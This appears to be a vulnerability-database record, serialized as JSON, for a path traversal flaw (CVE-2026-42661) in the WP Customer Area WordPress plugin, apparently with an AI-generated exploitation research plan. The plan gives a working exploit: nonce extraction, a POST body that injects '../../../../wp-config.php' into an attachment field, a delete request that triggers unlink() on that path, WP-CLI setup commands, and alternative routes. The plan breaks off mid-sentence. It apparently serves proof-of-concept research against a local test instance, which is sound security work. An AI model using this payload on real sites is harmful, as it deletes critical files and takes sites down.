[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fPPODwOzLtSFc1IqVX-omrABOpNymckXwUKv3RrYbLEA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2026-42661","wp-customer-area-authenticated-custom-path-traversal","WP Customer Area \u003C= 8.3.4 - Authenticated (Custom+) Path Traversal","The WP Customer Area plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 8.3.4. This makes it possible for authenticated attackers, with Custom-level access and above, to perform actions on files outside of the originally intended directory.","customer-area",null,"\u003C=8.3.4","8.3.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-05-01 00:00:00","2026-05-04 13:47:11",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd731f7bf-d2de-4f5f-8c4a-627713bec348?source=api-prod",4,[22,23,24,25,26,27,28],"customer-area.php","readme.txt","src\u002Fphp\u002Fcore-addons\u002Fcapabilities\u002Fcapabilities-addon.class.php","src\u002Fphp\u002Fcore-addons\u002Finstaller\u002Finstaller-addon.class.php","src\u002Fphp\u002Fcore-addons\u002Finstaller\u002Ftemplates\u002Finstaller-part-setup-wizard.template.php","src\u002Fphp\u002Fcore-addons\u002Fprivate-file\u002Fprivate-file-default-handlers.class.php","src\u002Fphp\u002Fcore-classes\u002Faddon-edit-content-page.class.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-42661\n\n## 1. Vulnerability Summary\nThe **WP Customer Area** plugin (\u003C= 8.3.4) is vulnerable to an authenticated path traversal vulnerability. The flaw exists in the handling of private file attachments. When a user with sufficient privileges (Custom-level or above) creates or edits a \"Private File\" (`cuar_private_file`), they can specify attachment metadata. \n\nSpecifically, the plugin fails to sanitize the `file` path parameter when using certain attachment methods (like `ftp-folder` or `server`). When these attachments are later deleted—either individually or when the parent post is deleted—the plugin performs an `unlink()` operation on the path stored in metadata. By injecting traversal sequences (e.g., `..\u002F..\u002F..\u002F..\u002Fwp-config.php`), an attacker can cause the plugin to delete arbitrary files on the server.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: Frontend Private Content Editor (handled by `CUAR_AbstractEditContentPageAddOn`).\n- **Target Action**: `create` or `update` of a `cuar_private_file`, followed by a `delete` action.\n- **Vulnerable Parameter**: `cuar_attachments[index][file]`\n- **Required Authentication**: A user account with capabilities to manage private files (e.g., `cuar_publish_private_files` and `cuar_delete_private_files`). These are often assigned to the \"Custom\" role or can be granted to standard roles like Subscriber.\n- **Precondition**: The \"Private Files\" and \"Post Owner\" add-ons (built-in) must be active.\n\n## 3. Code Flow\n1. **Entry**: User submits a form to `?customer-area-page=customer-private-files&cuar_action=create`.\n2. **Processing**: `CUAR_AbstractEditContentPageAddOn::handle_form_submission()` is triggered.\n3. **Nonce Validation**: It verifies `cuar_customer-private-files_nonce` against the action `cuar_customer-private-files`.\n4. **Attachment Handling**: `do_edit_content()` calls filters to process attachments. `CUAR_PrivateFilesDefaultHandlers::attach_ftp_file` (or `attach_server_file`) is called via the `cuar\u002Fprivate-content\u002Ffiles\u002Fon-attach-file?method=ftp-folder` hook.\n5. **Storage**: The traversal string `..\u002F..\u002F..\u002F..\u002Fwp-config.php` is saved into the post's metadata (`_cuar_attachments`).\n6. **Triggering the Sink**: The user submits a request to delete the post: `?customer-area-page=customer-private-files&cuar_action=delete&post_id=ID&nonce=NONCE`.\n7. **Cleanup**: `CUAR_PrivateFilesDefaultHandlers::remove_orphan_local_files` (or `remove_attached_local_file`) is triggered during post deletion.\n8. **Sink**:\n   - It calls `$po_addon->get_private_file_path($filename, $post_id, false)`.\n   - `$filename` is retrieved from meta as `..\u002F..\u002F..\u002F..\u002Fwp-config.php`.\n   - The resulting path points to the WordPress root.\n   - `unlink($filepath)` is executed.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required for both creation and deletion of content. \n\n1. **Identify Page**: The \"Create Private File\" page must be accessible.\n2. **Setup**: The PoC agent should ensure a page with the creation shortcode exists.\n   - Command: `wp post create --post_type=page --post_title=\"Create File\" --post_content='[customer_area_create_private_file]' --post_status=publish`\n3. **Navigate**: Use `browser_navigate` to go to the newly created page as the authenticated user.\n4. **Extract Nonce**: The nonce is stored in a hidden input field or localized JS.\n   - Field name: `cuar_customer-private-files_nonce`\n   - Extraction: `browser_eval(\"document.getElementsByName('cuar_customer-private-files_nonce')[0].value\")`\n\n## 5. Exploitation Strategy\n### Step 1: Create the Malicious Private File\nSend a POST request to create a private file with a traversed attachment path.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Findex.php?customer-area-page=customer-private-files&cuar_action=create`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```\n  cuar_form_id=customer-private-files&\n  cuar_customer-private-files_nonce=[EXTRACTED_NONCE]&\n  cuar_do_register=1&\n  cuar_title=Exploit&\n  cuar_content=Exploit&\n  cuar_attachments[0][file]=..\u002F..\u002F..\u002F..\u002Fwp-config.php&\n  cuar_attachments[0][method]=ftp-folder&\n  cuar_attachments[0][source]=local\n  ```\n\n### Step 2: Retrieve the Post ID\nIdentify the ID of the newly created `cuar_private_file`. This can be done by parsing the redirect URL or using WP-CLI.\n\n### Step 3: Trigger File Deletion\nSend a request to delete the created post. The plugin will attempt to \"clean up\" the attachments.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Findex.php?customer-area-page=customer-private-files&cuar_action=delete&post_id=[ID]&nonce=[EXTRACTED_NONCE]`\n- **Method**: `GET` (or `POST` with `cuar_do_register=1` depending on the UI implementation)\n\n## 6. Test Data Setup\n1. **Target User**: Create a user with the `subscriber` role.\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2. **Grant Capabilities**: The plugin uses custom capabilities. Grant them to the subscriber.\n   - `wp cap add subscriber cuar_publish_private_files`\n   - `wp cap add subscriber cuar_delete_private_files`\n   - `wp cap add subscriber cuar_edit_private_files`\n3. **Create Dashboard**: Ensure the Customer Area dashboard is initialized.\n   - `wp eval \"current_user_can('manage_options'); (new CUAR_CustomerPagesAddOn())->create_all_missing_pages();\"`\n4. **Target File**: Ensure `wp-config.php` exists (standard in WP).\n\n## 7. Expected Results\n- After Step 1, a new post of type `cuar_private_file` is created. Its `_cuar_attachments` meta contains the path `..\u002F..\u002F..\u002F..\u002Fwp-config.php`.\n- After Step 3, the `unlink()` function is called on the construction: `[STORAGE_DIR]\u002F[POST_ID]\u002F..\u002F..\u002F..\u002F..\u002Fwp-config.php`.\n- Since `wp-content\u002Fuploads\u002Fcustomer-area\u002Fstorage\u002F[ID]\u002F..\u002F..\u002F..\u002F..\u002F` resolves to the WordPress root, `wp-config.php` is deleted.\n\n## 8. Verification Steps\n1. **Check for Deletion**:\n   - Command: `wp file exists wp-config.php`\n   - Expected Output: Error or confirmation that the file is missing.\n2. **Check Database**:\n   - Command: `wp post list --post_type=cuar_private_file`\n   - The exploit post should no longer exist.\n\n## 9. Alternative Approaches\nIf the `ftp-folder` method is restricted by server configurations:\n- **Try `method=server`**: If the \"Server Side Folders\" logic is active, use `cuar_attachments[0][method]=server` and `cuar_attachments[0][source]=server`.\n- **Direct Meta Update (if another vuln exists)**: If there is a separate vulnerability allowing arbitrary metadata updates, setting `_cuar_attachments` directly and then using the frontend \"Remove Attachment\" button (AJAX) would also trigger the `unlink`.\n- **Blind Deletion**: If the plugin does not provide feedback, use `","gemini-3-flash-preview","2026-05-04 17:38:36","2026-05-04 17:39:36",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","8.3.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-area\u002Ftags\u002F8.3.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-area.8.3.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-area\u002Ftags\u002F8.3.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-area.8.3.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-area\u002Ftags"]